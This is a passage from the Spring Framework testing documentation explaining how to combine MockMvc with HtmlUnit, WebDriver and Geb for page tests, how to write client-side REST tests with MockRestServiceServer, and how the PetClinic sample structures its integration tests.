testing\naltogether. Instead, we can reduce the number of end-to-end integration tests by\nrefactoring our detailed tests to use mock services which will execute much faster, more\nreliably, and without side effects. 
We can then implement a small number of _true_\nend-to-end integration tests that validate simple workflows to ensure that everything\nworks together properly.\n\n[[spring-mvc-test-server-htmlunit-why-mockmvc]]\n====== Enter HtmlUnit Integration\n\nSo how can we achieve a balance between testing the interactions of our pages and still\nretain good performance within our test suite? The answer is: \"By integrating MockMvc\nwith HtmlUnit.\"\n\n[[spring-mvc-test-server-htmlunit-options]]\n====== HtmlUnit Integration Options\n\nThere are a number of ways to integrate `MockMvc` with HtmlUnit.\n\n* <<spring-mvc-test-server-htmlunit-mah,MockMvc and HtmlUnit>>: Use this option if you\nwant to use the raw HtmlUnit libraries.\n* <<spring-mvc-test-server-htmlunit-webdriver,MockMvc and WebDriver>>: Use this option to\nease development and reuse code between integration and end-to-end testing.\n* <<spring-mvc-test-server-htmlunit-geb,MockMvc and Geb>>: Use this option if you would\nlike to use Groovy for testing, ease development, and reuse code between integration and\nend-to-end testing.\n\n[[spring-mvc-test-server-htmlunit-mah]]\n===== MockMvc and HtmlUnit\n\nThis section describes how to integrate `MockMvc` and HtmlUnit. Use this option if you\nwant to use the raw HtmlUnit libraries.\n\n[[spring-mvc-test-server-htmlunit-mah-setup]]\n====== MockMvc and HtmlUnit Setup\n\nFirst, make sure that you have included a test dependency on `net.sourceforge.htmlunit:htmlunit`.\nIn order to use HtmlUnit with Apache HttpComponents 4.5+, you will need to use HtmlUnit\n2.18 or higher.\n\nWe can easily create an HtmlUnit `WebClient` that integrates with `MockMvc` using the\n`MockMvcWebClientBuilder` as follows.\n\n[source,java]\n----\n@Autowired\nWebApplicationContext context;\n\nWebClient webClient;\n\n@Before\npublic void setup() {\n\twebClient = MockMvcWebClientBuilder\n\t\t.webAppContextSetup(context)\n\t\t.build();\n}\n----\n\n[NOTE]\n====\nThis is a simple example of using `MockMvcWebClientBuilder`. For advanced usage see\n<<Advanced MockMvcWebClientBuilder>>\n====\n\nThis will ensure that any URL referencing `localhost` as the server will be directed to\nour `MockMvc` instance without the need for a real HTTP connection. Any other URL will be\nrequested using a network connection as normal. This allows us to easily test the use of\nCDNs.\n\n[[spring-mvc-test-server-htmlunit-mah-usage]]\n====== MockMvc and HtmlUnit Usage\n\nNow we can use HtmlUnit as we normally would, but without the need to deploy our\napplication to a Servlet container. For example, we can request the view to create\na message with the following.\n\n[source,java]\n----\nHtmlPage createMsgFormPage = webClient.getPage(\"http:\/\/localhost\/messages\/form\");\n----\n\n[NOTE]\n====\nThe default context path is `\"\"`. 
Alternatively, we can specify the context path as\nillustrated in <<Advanced MockMvcWebClientBuilder>>.\n====\n\nOnce we have a reference to the `HtmlPage`, we can then fill out the form and submit\nit to create a message.\n\n[source,java]\n----\nHtmlForm form = createMsgFormPage.getHtmlElementById(\"messageForm\");\nHtmlTextInput summaryInput = createMsgFormPage.getHtmlElementById(\"summary\");\nsummaryInput.setValueAttribute(\"Spring Rocks\");\nHtmlTextArea textInput = createMsgFormPage.getHtmlElementById(\"text\");\ntextInput.setText(\"In case you didn't know, Spring Rocks!\");\nHtmlSubmitInput submit = form.getOneHtmlElementByAttribute(\"input\", \"type\", \"submit\");\nHtmlPage newMessagePage = submit.click();\n----\n\nFinally, we can verify that a new message was created successfully. The following\nassertions use the http:\/\/joel-costigliola.github.io\/assertj\/[AssertJ] library.\n\n[source,java]\n----\nassertThat(newMessagePage.getUrl().toString()).endsWith(\"\/messages\/123\");\nString id = newMessagePage.getHtmlElementById(\"id\").getTextContent();\nassertThat(id).isEqualTo(\"123\");\nString summary = newMessagePage.getHtmlElementById(\"summary\").getTextContent();\nassertThat(summary).isEqualTo(\"Spring Rocks\");\nString text = newMessagePage.getHtmlElementById(\"text\").getTextContent();\nassertThat(text).isEqualTo(\"In case you didn't know, Spring Rocks!\");\n----\n\nThis improves on our <<spring-mvc-test-server-htmlunit-mock-mvc-test,MockMvc test>> in a\nnumber of ways. First we no longer have to explicitly verify our form and then create a\nrequest that looks like the form. Instead, we request the form, fill it out, and submit\nit, thereby significantly reducing the overhead.\n\nAnother important factor is that http:\/\/htmlunit.sourceforge.net\/javascript.html[HtmlUnit\nuses the Mozilla Rhino engine] to evaluate JavaScript. This means that we can test the\nbehavior of JavaScript within our pages as well!\n\nRefer to the http:\/\/htmlunit.sourceforge.net\/gettingStarted.html[HtmlUnit documentation]\nfor additional information about using HtmlUnit.\n\n[[spring-mvc-test-server-htmlunit-mah-advanced-builder]]\n====== Advanced MockMvcWebClientBuilder\n\nIn the examples so far, we have used `MockMvcWebClientBuilder` in the simplest way possible,\nby building a `WebClient` based on the `WebApplicationContext` loaded for us by the Spring\nTestContext Framework. 
This approach is repeated here.\n\n[source,java]\n----\n@Autowired\nWebApplicationContext context;\n\nWebClient webClient;\n\n@Before\npublic void setup() {\n\twebClient = MockMvcWebClientBuilder\n\t\t.webAppContextSetup(context)\n\t\t.build();\n}\n----\n\nWe can also specify additional configuration options.\n\n[source,java]\n----\nWebClient webClient;\n\n@Before\npublic void setup() {\n\twebClient = MockMvcWebClientBuilder\n\t\t\/\/ demonstrates applying a MockMvcConfigurer (Spring Security)\n\t\t.webAppContextSetup(context, springSecurity())\n\t\t\/\/ for illustration only - defaults to \"\"\n\t\t.contextPath(\"\")\n\t\t\/\/ By default MockMvc is used for localhost only;\n\t\t\/\/ the following will use MockMvc for example.com and example.org as well\n\t\t.useMockMvcForHosts(\"example.com\",\"example.org\")\n\t\t.build();\n}\n----\n\nAs an alternative, we can perform the exact same setup by configuring the `MockMvc`\ninstance separately and supplying it to the `MockMvcWebClientBuilder` as follows.\n\n[source,java]\n----\nMockMvc mockMvc = MockMvcBuilders\n\t\t.webAppContextSetup(context)\n\t\t.apply(springSecurity())\n\t\t.build();\n\nwebClient = MockMvcWebClientBuilder\n\t\t.mockMvcSetup(mockMvc)\n\t\t\/\/ for illustration only - defaults to \"\"\n\t\t.contextPath(\"\")\n\t\t\/\/ By default MockMvc is used for localhost only;\n\t\t\/\/ the following will use MockMvc for example.com and example.org as well\n\t\t.useMockMvcForHosts(\"example.com\",\"example.org\")\n\t\t.build();\n----\n\nThis is more verbose, but by building the `WebClient` with a `MockMvc` instance we have\nthe full power of `MockMvc` at our fingertips.\n\n[TIP]\n====\nFor additional information on creating a `MockMvc` instance refer to\n<<spring-mvc-test-server-setup-options>>.\n====\n\n[[spring-mvc-test-server-htmlunit-webdriver]]\n===== MockMvc and WebDriver\n\nIn the previous sections, we have seen how to use `MockMvc` in conjunction with the raw\nHtmlUnit APIs. In this section, we will leverage additional abstractions within the Selenium\nhttp:\/\/docs.seleniumhq.org\/projects\/webdriver\/[WebDriver] to make things even easier.\n\n[[spring-mvc-test-server-htmlunit-webdriver-why]]\n====== Why WebDriver and MockMvc?\n\nWe can already use HtmlUnit and `MockMvc`, so why would we want to use `WebDriver`? The\nSelenium `WebDriver` provides a very elegant API that allows us to easily organize our code.\nTo better understand, let's explore an example.\n\n[NOTE]\n====\nDespite being a part of http:\/\/docs.seleniumhq.org\/[Selenium], WebDriver does not require\na Selenium Server to run your tests.\n====\n\nSuppose we need to ensure that a message is created properly. The tests involve finding\nthe HTML form input elements, filling them out, and making various assertions.\n\nThis approach results in numerous, separate tests because we want to test error\nconditions as well. For example, we want to ensure that we get an error if we fill out\nonly part of the form. If we fill out the entire form, the newly created message should\nbe displayed afterwards.\n\nIf one of the fields were named \"summary\", then we might have something like the\nfollowing repeated in multiple places within our tests.\n\n[source,java]\n----\nHtmlTextInput summaryInput = currentPage.getHtmlElementById(\"summary\");\nsummaryInput.setValueAttribute(summary);\n----\n\nSo what happens if we change the `id` to \"smmry\"? Doing so would force us to update all\nof our tests to incorporate this change! 
Of course, this violates the _DRY Principle_, so we should ideally extract this code into
its own method as follows.

[source,java]
----
public HtmlPage createMessage(HtmlPage currentPage, String summary, String text) {
	setSummary(currentPage, summary);
	// ...
}

public void setSummary(HtmlPage currentPage, String summary) {
	HtmlTextInput summaryInput = currentPage.getHtmlElementById("summary");
	summaryInput.setValueAttribute(summary);
}
----

This ensures that we do not have to update all of our tests if we change the UI.

We might even take this a step further and place this logic within an Object that
represents the `HtmlPage` we are currently on.

[source,java]
----
public class CreateMessagePage {

	final HtmlPage currentPage;

	final HtmlTextInput summaryInput;

	final HtmlSubmitInput submit;

	public CreateMessagePage(HtmlPage currentPage) {
		this.currentPage = currentPage;
		this.summaryInput = currentPage.getHtmlElementById("summary");
		this.submit = currentPage.getHtmlElementById("submit");
	}

	public <T> T createMessage(String summary, String text) throws Exception {
		setSummary(summary);

		HtmlPage result = submit.click();
		boolean error = CreateMessagePage.at(result);

		return (T) (error ? new CreateMessagePage(result) : new ViewMessagePage(result));
	}

	public void setSummary(String summary) throws Exception {
		summaryInput.setValueAttribute(summary);
	}

	public static boolean at(HtmlPage page) {
		return "Create Message".equals(page.getTitleText());
	}
}
----

Formally, this pattern is known as the
https://github.com/SeleniumHQ/selenium/wiki/PageObjects[Page Object Pattern]. While we can
certainly do this with HtmlUnit, WebDriver provides some tools that we will explore in the
following sections to make this pattern much easier to implement.

[[spring-mvc-test-server-htmlunit-webdriver-setup]]
====== MockMvc and WebDriver Setup

To use Selenium WebDriver with the Spring MVC Test framework, make sure that your project
includes a test dependency on `org.seleniumhq.selenium:selenium-htmlunit-driver`.

We can easily create a Selenium `WebDriver` that integrates with `MockMvc` using the
`MockMvcHtmlUnitDriverBuilder` as follows.

[source,java]
----
@Autowired
WebApplicationContext context;

WebDriver driver;

@Before
public void setup() {
	driver = MockMvcHtmlUnitDriverBuilder
		.webAppContextSetup(context)
		.build();
}
----

[NOTE]
====
This is a simple example of using `MockMvcHtmlUnitDriverBuilder`.
For more advanced usage, refer to <<Advanced MockMvcHtmlUnitDriverBuilder>>.
====

This will ensure that any URL referencing `localhost` as the server will be directed to
our `MockMvc` instance without the need for a real HTTP connection. Any other URL will be
requested using a network connection as normal. This allows us to easily test the use of
CDNs.

[[spring-mvc-test-server-htmlunit-webdriver-usage]]
====== MockMvc and WebDriver Usage

Now we can use WebDriver as we normally would, but without the need to deploy our
application to a Servlet container.
For example, we can request the view to create\na message with the following.\n\n[source,java]\n----\nCreateMessagePage page = CreateMessagePage.to(driver);\n----\n\nWe can then fill out the form and submit it to create a message.\n\n[source,java]\n----\nViewMessagePage viewMessagePage =\n\tpage.createMessage(ViewMessagePage.class, expectedSummary, expectedText);\n----\n\nThis improves on the design of our\n<<spring-mvc-test-server-htmlunit-mah-usage,HtmlUnit test>> by leveraging the _Page Object\nPattern_. As we mentioned in <<spring-mvc-test-server-htmlunit-webdriver-why>>, we can\nuse the Page Object Pattern with HtmlUnit, but it is much easier with WebDriver. Let's\ntake a look at our new `CreateMessagePage` implementation.\n\n[source,java]\n----\npublic class CreateMessagePage\n\t\textends AbstractPage { \/\/ <1>\n\n\t\/\/ <2>\n\tprivate WebElement summary;\n\tprivate WebElement text;\n\n\t\/\/ <3>\n\t@FindBy(css = \"input[type=submit]\")\n\tprivate WebElement submit;\n\n\tpublic CreateMessagePage(WebDriver driver) {\n\t\tsuper(driver);\n\t}\n\n\tpublic <T> T createMessage(Class<T> resultPage, String summary, String details) {\n\t\tthis.summary.sendKeys(summary);\n\t\tthis.text.sendKeys(details);\n\t\tthis.submit.click();\n\t\treturn PageFactory.initElements(driver, resultPage);\n\t}\n\n\tpublic static CreateMessagePage to(WebDriver driver) {\n\t\tdriver.get(\"http:\/\/localhost:9990\/mail\/messages\/form\");\n\t\treturn PageFactory.initElements(driver, CreateMessagePage.class);\n\t}\n}\n----\n\n<1> The first thing you will notice is that `CreateMessagePage` extends the\n`AbstractPage`. We won't go over the details of `AbstractPage`, but in summary it\ncontains common functionality for all of our pages. For example, if our application has\na navigational bar, global error messages, etc., this logic can be placed in a shared\nlocation.\n\n<2> The next thing you will notice is that we have a member variable for each of the\nparts of the HTML page that we are interested in. These are of type `WebElement`.\n``WebDriver``'s https:\/\/github.com\/SeleniumHQ\/selenium\/wiki\/PageFactory[PageFactory] allows\nus to remove a lot of code from the HtmlUnit version of `CreateMessagePage` by\nautomatically resolving each `WebElement`. The\nhttps:\/\/seleniumhq.github.io\/selenium\/docs\/api\/java\/org\/openqa\/selenium\/support\/PageFactory.html#initElements-org.openqa.selenium.WebDriver-java.lang.Class-[PageFactory#initElements(WebDriver,Class<T>)]\nmethod will automatically resolve each `WebElement` by using the field name and looking it\nup by the `id` or `name` of the element within the HTML page.\n\n<3> We can use the\nhttps:\/\/github.com\/SeleniumHQ\/selenium\/wiki\/PageFactory#making-the-example-work-using-annotations[@FindBy annotation]\nto override the default lookup behavior. Our example demonstrates how to use the `@FindBy`\nannotation to look up our submit button using a css selector, *input[type=submit]*.\n\nFinally, we can verify that a new message was created successfully. The following\nassertions use the https:\/\/code.google.com\/p\/fest\/[FEST assertion library].\n\n[source,java]\n----\nassertThat(viewMessagePage.getMessage()).isEqualTo(expectedMessage);\nassertThat(viewMessagePage.getSuccess()).isEqualTo(\"Successfully created a new message\");\n----\n\nWe can see that our `ViewMessagePage` allows us to interact with our custom domain\nmodel. 
For example, it exposes a method that returns a `Message` object.\n\n[source,java]\n----\npublic Message getMessage() throws ParseException {\n\tMessage message = new Message();\n\tmessage.setId(getId());\n\tmessage.setCreated(getCreated());\n\tmessage.setSummary(getSummary());\n\tmessage.setText(getText());\n\treturn message;\n}\n----\n\nWe can then leverage the rich domain objects in our assertions.\n\nLastly, don't forget to _close_ the `WebDriver` instance when the test is complete.\n\n[source,java]\n----\n@After\npublic void destroy() {\n\tif (driver != null) {\n\t\tdriver.close();\n\t}\n}\n----\n\nFor additional information on using WebDriver, refer to the Selenium\nhttps:\/\/github.com\/SeleniumHQ\/selenium\/wiki\/Getting-Started[WebDriver documentation].\n\n[[spring-mvc-test-server-htmlunit-webdriver-advanced-builder]]\n====== Advanced MockMvcHtmlUnitDriverBuilder\n\nIn the examples so far, we have used `MockMvcHtmlUnitDriverBuilder` in the simplest way\npossible, by building a `WebDriver` based on the `WebApplicationContext` loaded for us by\nthe Spring TestContext Framework. This approach is repeated here.\n\n[source,java]\n----\n@Autowired\nWebApplicationContext context;\n\nWebDriver driver;\n\n@Before\npublic void setup() {\n\tdriver = MockMvcHtmlUnitDriverBuilder\n\t\t.webAppContextSetup(context)\n\t\t.build();\n}\n----\n\nWe can also specify additional configuration options.\n\n[source,java]\n----\nWebDriver driver;\n\n@Before\npublic void setup() {\n\tdriver = MockMvcHtmlUnitDriverBuilder\n\t\t\/\/ demonstrates applying a MockMvcConfigurer (Spring Security)\n\t\t.webAppContextSetup(context, springSecurity())\n\t\t\/\/ for illustration only - defaults to \"\"\n\t\t.contextPath(\"\")\n\t\t\/\/ By default MockMvc is used for localhost only;\n\t\t\/\/ the following will use MockMvc for example.com and example.org as well\n\t\t.useMockMvcForHosts(\"example.com\",\"example.org\")\n\t\t.build();\n}\n----\n\nAs an alternative, we can perform the exact same setup by configuring the `MockMvc`\ninstance separately and supplying it to the `MockMvcHtmlUnitDriverBuilder` as follows.\n\n[source,java]\n----\nMockMvc mockMvc = MockMvcBuilders\n\t\t.webAppContextSetup(context)\n\t\t.apply(springSecurity())\n\t\t.build();\n\ndriver = MockMvcHtmlUnitDriverBuilder\n\t\t.mockMvcSetup(mockMvc)\n\t\t\/\/ for illustration only - defaults to \"\"\n\t\t.contextPath(\"\")\n\t\t\/\/ By default MockMvc is used for localhost only;\n\t\t\/\/ the following will use MockMvc for example.com and example.org as well\n\t\t.useMockMvcForHosts(\"example.com\",\"example.org\")\n\t\t.build();\n----\n\nThis is more verbose, but by building the `WebDriver` with a `MockMvc` instance we have\nthe full power of `MockMvc` at our fingertips.\n\n[TIP]\n====\nFor additional information on creating a `MockMvc` instance refer to\n<<spring-mvc-test-server-setup-options>>.\n====\n\n[[spring-mvc-test-server-htmlunit-geb]]\n===== MockMvc and Geb\n\nIn the previous section, we saw how to use `MockMvc` with `WebDriver`. In this section,\nwe will use http:\/\/www.gebish.org\/[Geb] to make our tests even Groovy-er.\n\n\n[[spring-mvc-test-server-htmlunit-geb-why]]\n====== Why Geb and MockMvc?\n\nGeb is backed by WebDriver, so it offers many of the\n<<spring-mvc-test-server-htmlunit-webdriver-why,same benefits>> that we get from\nWebDriver. 
However, Geb makes things even easier by taking care of some of the\nboilerplate code for us.\n\n[[spring-mvc-test-server-htmlunit-geb-setup]]\n====== MockMvc and Geb Setup\n\nWe can easily initialize a Geb `Browser` with a Selenium `WebDriver` that uses `MockMvc`\nas follows.\n\n[source,groovy]\n----\ndef setup() {\n\tbrowser.driver = MockMvcHtmlUnitDriverBuilder\n\t\t.webAppContextSetup(context)\n\t\t.build()\n}\n----\n\n[NOTE]\n====\nThis is a simple example of using `MockMvcHtmlUnitDriverBuilder`.\nFor more advanced usage, refer to\n<<spring-mvc-test-server-htmlunit-webdriver-advanced-builder>>.\n====\n\nThis will ensure that any URL referencing `localhost` as the server will be directed to\nour `MockMvc` instance without the need for a real HTTP connection. Any other URL will be\nrequested using a network connection as normal. This allows us to easily test the use of\nCDNs.\n\n[[spring-mvc-test-server-htmlunit-geb-usage]]\n====== MockMvc and Geb Usage\n\nNow we can use Geb as we normally would, but without the need to deploy our\napplication to a Servlet container. For example, we can request the view to create\na message with the following:\n\n[source,groovy]\n----\nto CreateMessagePage\n----\n\nWe can then fill out the form and submit it to create a message.\n\n[source,groovy]\n----\nwhen:\nform.summary = expectedSummary\nform.text = expectedMessage\nsubmit.click(ViewMessagePage)\n----\n\nAny method calls or property accesses\/references that Geb cannot resolve directly are\nforwarded to the current page object. This removes a lot of the boilerplate code we needed\nwhen using WebDriver directly.\n\nAs with direct WebDriver usage, this improves on the design of our\n<<spring-mvc-test-server-htmlunit-mah-usage,HtmlUnit test>> by leveraging the _Page Object\nPattern_. As mentioned previously, we can use the Page Object Pattern with HtmlUnit and\nWebDriver, but it is even easier with Geb. Let's take a look at our new Groovy-based\n`CreateMessagePage` implementation.\n\n[source,groovy]\n----\nclass CreateMessagePage extends Page {\n\tstatic url = 'messages\/form'\n\tstatic at = { assert title == 'Messages : Create'; true }\n\tstatic content = {\n\t\tsubmit { $('input[type=submit]') }\n\t\tform { $('form') }\n\t\terrors(required:false) { $('label.error, .alert-error')?.text() }\n\t}\n}\n----\n\nThe first thing you will notice is that our `CreateMessagePage` extends `Page`. We won't\ngo over the details of `Page`, but in summary it contains common functionality for all of\nour pages. The next thing you will notice is that we define the URL at which this page can\nbe found. This allows us to navigate to the page as follows.\n\n[source,groovy]\n----\nto CreateMessagePage\n----\n\nWe also have an `at` closure that determines if we are at the specified page. It should return\n`true` if we are on the correct page. 
This is why we can assert that we are on the correct\npage as follows.\n\n[source,groovy]\n----\nthen:\nat CreateMessagePage\nerrors.contains('This field is required.')\n----\n\n[NOTE]\n====\nWe use an assertion in the `at` closure, so that we can determine where things went wrong if\nwe were at the wrong page.\n====\n\nNext we create a `content` closure that specifies all the areas of interest within the page.\nWe can use a\nhttp:\/\/www.gebish.org\/manual\/current\/#the-jquery-ish-navigator-api[jQuery-ish Navigator API]\nto select the content we are interested in.\n\nFinally, we can verify that a new message was created successfully.\n\n[source,groovy]\n----\nthen:\nat ViewMessagePage\nsuccess == 'Successfully created a new message'\nid\ndate\nsummary == expectedSummary\nmessage == expectedMessage\n----\n\nFor further details on how to get the most out of Geb, consult\nhttp:\/\/www.gebish.org\/manual\/current\/[The Book of Geb] user's manual.\n\n\n[[spring-mvc-test-client]]\n==== Client-Side REST Tests\nClient-side tests can be used to test code that internally uses the `RestTemplate`.\nThe idea is to declare expected requests and to provide \"stub\" responses so that\nyou can focus on testing the code in isolation, i.e. without running a server.\nHere is an example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tRestTemplate restTemplate = new RestTemplate();\n\n\tMockRestServiceServer mockServer = MockRestServiceServer.bindTo(restTemplate).build();\n\tmockServer.expect(requestTo(\"\/greeting\")).andRespond(withSuccess());\n\n\t\/\/ Test code that uses the above RestTemplate ...\n\n\tmockServer.verify();\n----\n\nIn the above example, `MockRestServiceServer`, the central class for client-side REST\ntests, configures the `RestTemplate` with a custom `ClientHttpRequestFactory` that\nasserts actual requests against expectations and returns \"stub\" responses. In this case\nwe expect a request to \"\/greeting\" and want to return a 200 response with\n\"text\/plain\" content. We can define additional expected requests and stub responses as\nneeded. When expected requests and stub responses are defined, the `RestTemplate` can be\nused in client-side code as usual. At the end of the test, `mockServer.verify()` can be\nused to verify that all expectations have been satisfied.\n\nBy default, requests are expected in the order in which expectations were declared.\nYou can set the `ignoreExpectOrder` option when building the server, in which case\nall expectations are checked (in order) to find a match for a given request. That\nmeans requests are allowed to come in any order. Here is an example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tserver = MockRestServiceServer.bindTo(restTemplate).ignoreExpectOrder(true).build();\n----\n\nEven with unordered requests, each request is by default allowed to execute only once.\nThe `expect` method provides an overloaded variant that accepts an `ExpectedCount`\nargument that specifies a count range, e.g. `once`, `manyTimes`, `max`, `min`,\n`between`, and so on. 
Here is an example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tRestTemplate restTemplate = new RestTemplate();\n\n\tMockRestServiceServer mockServer = MockRestServiceServer.bindTo(restTemplate).build();\n\tmockServer.expect(times(2), requestTo(\"\/foo\")).andRespond(withSuccess());\n\tmockServer.expect(times(3), requestTo(\"\/bar\")).andRespond(withSuccess());\n\n\t\/\/ ...\n\n\tmockServer.verify();\n----\n\nNote that when `ignoreExpectOrder` is not set (the default), and therefore requests\nare expected in order of declaration, that order applies only to the first of any\nexpected request. For example, if \"\/foo\" is expected 2 times followed by \"\/bar\"\n3 times, then there should be a request to \"\/foo\" before there is a request to \"\/bar\",\nbut aside from that, subsequent \"\/foo\" and \"\/bar\" requests can come at any time.\n\nAs an alternative to all of the above, the client-side test support also provides a\n`ClientHttpRequestFactory` implementation that can be configured into a `RestTemplate`\nto bind it to a `MockMvc` instance. That allows processing requests using actual\nserver-side logic but without running a server. Here is an example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tMockMvc mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();\n\tthis.restTemplate = new RestTemplate(new MockMvcClientHttpRequestFactory(mockMvc));\n\n\t\/\/ Test code that uses the above RestTemplate ...\n----\n\n\n\n[[spring-mvc-test-client-static-imports]]\n===== Static Imports\nJust like with server-side tests, the fluent API for client-side tests requires a few\nstatic imports. Those are easy to find by searching __\"MockRest*\"__. Eclipse users\nshould add `\"MockRestRequestMatchers.{asterisk}\"` and `\"MockRestResponseCreators.{asterisk}\"`\nas \"favorite static members\" in the Eclipse preferences under\n__Java -> Editor -> Content Assist -> Favorites__.\nThat allows using content assist after typing the first character of the\nstatic method name. Other IDEs (e.g. IntelliJ) may not require any additional\nconfiguration. Just check the support for code completion on static members.\n\n[[spring-mvc-test-client-resources]]\n===== Further Examples of Client-side REST Tests\nSpring MVC Test's own tests include\nhttps:\/\/github.com\/spring-projects\/spring-framework\/tree\/master\/spring-test\/src\/test\/java\/org\/springframework\/test\/web\/client\/samples[example\ntests] of client-side REST tests.\n\n\n\n[[testing-examples-petclinic]]\n=== PetClinic Example\n\nThe PetClinic application, available on\nhttps:\/\/github.com\/spring-projects\/spring-petclinic[GitHub], illustrates several features\nof the __Spring TestContext Framework__ in a JUnit 4 environment. 
Most test functionality\nis included in the `AbstractClinicTests`, for which a partial listing is shown below:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\timport static org.junit.Assert.assertEquals;\n\t\/\/ import ...\n\n\t**@ContextConfiguration**\n\tpublic abstract class AbstractClinicTests **extends AbstractTransactionalJUnit4SpringContextTests** {\n\n\t\t**@Autowired**\n\t\tprotected Clinic clinic;\n\n\t\t@Test\n\t\tpublic void getVets() {\n\t\t\tCollection<Vet> vets = this.clinic.getVets();\n\t\t\tassertEquals(\"JDBC query must show the same number of vets\",\n\t\t\t\t**super.countRowsInTable(\"VETS\")**, vets.size());\n\t\t\tVet v1 = EntityUtils.getById(vets, Vet.class, 2);\n\t\t\tassertEquals(\"Leary\", v1.getLastName());\n\t\t\tassertEquals(1, v1.getNrOfSpecialties());\n\t\t\tassertEquals(\"radiology\", (v1.getSpecialties().get(0)).getName());\n\t\t\t\/\/ ...\n\t\t}\n\n\t\t\/\/ ...\n\t}\n----\n\nNotes:\n\n* This test case extends the `AbstractTransactionalJUnit4SpringContextTests` class, from\n which it inherits configuration for Dependency Injection (through the\n `DependencyInjectionTestExecutionListener`) and transactional behavior (through the\n `TransactionalTestExecutionListener`).\n* The `clinic` instance variable -- the application object being tested -- is set by\n Dependency Injection through `@Autowired` semantics.\n* The `getVets()` method illustrates how you can use the inherited `countRowsInTable()`\n method to easily verify the number of rows in a given table, thus verifying correct\n behavior of the application code being tested. This allows for stronger tests and\n lessens dependency on the exact test data. For example, you can add additional rows in\n the database without breaking tests.\n* Like many integration tests that use a database, most of the tests in\n `AbstractClinicTests` depend on a minimum amount of data already in the database before\n the test cases run. Alternatively, you might choose to populate the database within the\n test fixture set up of your test cases -- again, within the same transaction as the\n tests.\n\nThe PetClinic application supports three data access technologies: JDBC, Hibernate, and\nJPA. By declaring `@ContextConfiguration` without any specific resource locations, the\n`AbstractClinicTests` class will have its application context loaded from the default\nlocation, `AbstractClinicTests-context.xml`, which declares a common `DataSource`.\nSubclasses specify additional context locations that must declare a\n`PlatformTransactionManager` and a concrete implementation of `Clinic`.\n\nFor example, the Hibernate implementation of the PetClinic tests contains the following\nimplementation. For this example, `HibernateClinicTests` does not contain a single line\nof code: we only need to declare `@ContextConfiguration`, and the tests are inherited\nfrom `AbstractClinicTests`. 
Because `@ContextConfiguration` is declared without any\nspecific resource locations, the __Spring TestContext Framework__ loads an application\ncontext from all the beans defined in `AbstractClinicTests-context.xml` (i.e., the\ninherited locations) and `HibernateClinicTests-context.xml`, with\n`HibernateClinicTests-context.xml` possibly overriding beans defined in\n`AbstractClinicTests-context.xml`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@ContextConfiguration**\n\tpublic class HibernateClinicTests extends AbstractClinicTests { }\n----\n\nIn a large-scale application, the Spring configuration is often split across multiple\nfiles. Consequently, configuration locations are typically specified in a common base\nclass for all application-specific integration tests. Such a base class may also add\nuseful instance variables -- populated by Dependency Injection, naturally -- such as a\n`SessionFactory` in the case of an application using Hibernate.\n\nAs far as possible, you should have exactly the same Spring configuration files in your\nintegration tests as in the deployed environment. One likely point of difference\nconcerns database connection pooling and transaction infrastructure. If you are\ndeploying to a full-blown application server, you will probably use its connection pool\n(available through JNDI) and JTA implementation. Thus in production you will use a\n`JndiObjectFactoryBean` or `<jee:jndi-lookup>` for the `DataSource` and\n`JtaTransactionManager`. JNDI and JTA will not be available in out-of-container\nintegration tests, so you should use a combination like the Commons DBCP\n`BasicDataSource` and `DataSourceTransactionManager` or `HibernateTransactionManager`\nfor them. You can factor out this variant behavior into a single XML file, having the\nchoice between application server and a 'local' configuration separated from all other\nconfiguration, which will not vary between the test and production environments. In\naddition, it is advisable to use properties files for connection settings. 
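\n\nAs a rough illustration of this approach -- shown here as Java configuration for brevity,\nand with a hypothetical `jdbc.properties` file and property names that are not taken from\nthe PetClinic itself -- the 'local' variant might look something like the following.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t@PropertySource(\"classpath:jdbc.properties\")\n\tpublic class LocalInfrastructureConfig {\n\n\t\t@Autowired\n\t\tEnvironment env;\n\n\t\t@Bean\n\t\tpublic DataSource dataSource() {\n\t\t\t\/\/ Commons DBCP pool configured from jdbc.properties\n\t\t\tBasicDataSource dataSource = new BasicDataSource();\n\t\t\tdataSource.setDriverClassName(env.getProperty(\"jdbc.driverClassName\"));\n\t\t\tdataSource.setUrl(env.getProperty(\"jdbc.url\"));\n\t\t\tdataSource.setUsername(env.getProperty(\"jdbc.username\"));\n\t\t\tdataSource.setPassword(env.getProperty(\"jdbc.password\"));\n\t\t\treturn dataSource;\n\t\t}\n\n\t\t@Bean\n\t\tpublic PlatformTransactionManager transactionManager() {\n\t\t\t\/\/ local transaction manager instead of the application server's JTA\n\t\t\treturn new DataSourceTransactionManager(dataSource());\n\t\t}\n\t}\n----\n\n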
See the\nPetClinic application for an example.\n\n\n\n\n[[testing-resources]]\n== Further Resources\nConsult the following resources for more information about testing:\n\n* http:\/\/www.junit.org\/[JUnit]: \"__A programmer-oriented testing framework for Java__\".\n Used by the Spring Framework in its test suite.\n* http:\/\/testng.org\/[TestNG]: A testing framework inspired by JUnit with added support\n for annotations, test groups, data-driven testing, distributed testing, etc.\n* http:\/\/joel-costigliola.github.io\/assertj\/[AssertJ]: \"__Fluent assertions for Java__\"\n including support for Java 8 lambdas, streams, etc.\n* http:\/\/en.wikipedia.org\/wiki\/Mock_Object[Mock Objects]: Article in Wikipedia.\n* http:\/\/www.mockobjects.com\/[MockObjects.com]: Web site dedicated to mock objects, a\n technique for improving the design of code within test-driven development.\n* http:\/\/mockito.org\/[Mockito]: Java mock library based on the\n http:\/\/xunitpatterns.com\/Test%20Spy.html[test spy] pattern.\n* http:\/\/www.easymock.org\/[EasyMock]: Java library \"__that provides Mock Objects for\n interfaces (and objects through the class extension) by generating them on the fly\n using Java's proxy mechanism.__\" Used by the Spring Framework in its test suite.\n* http:\/\/www.jmock.org\/[JMock]: Library that supports test-driven development of Java\n code with mock objects.\n* http:\/\/dbunit.sourceforge.net\/[DbUnit]: JUnit extension (also usable with Ant and\n Maven) targeted for database-driven projects that, among other things, puts your\n database into a known state between test runs.\n* http:\/\/grinder.sourceforge.net\/[The Grinder]: Java load testing 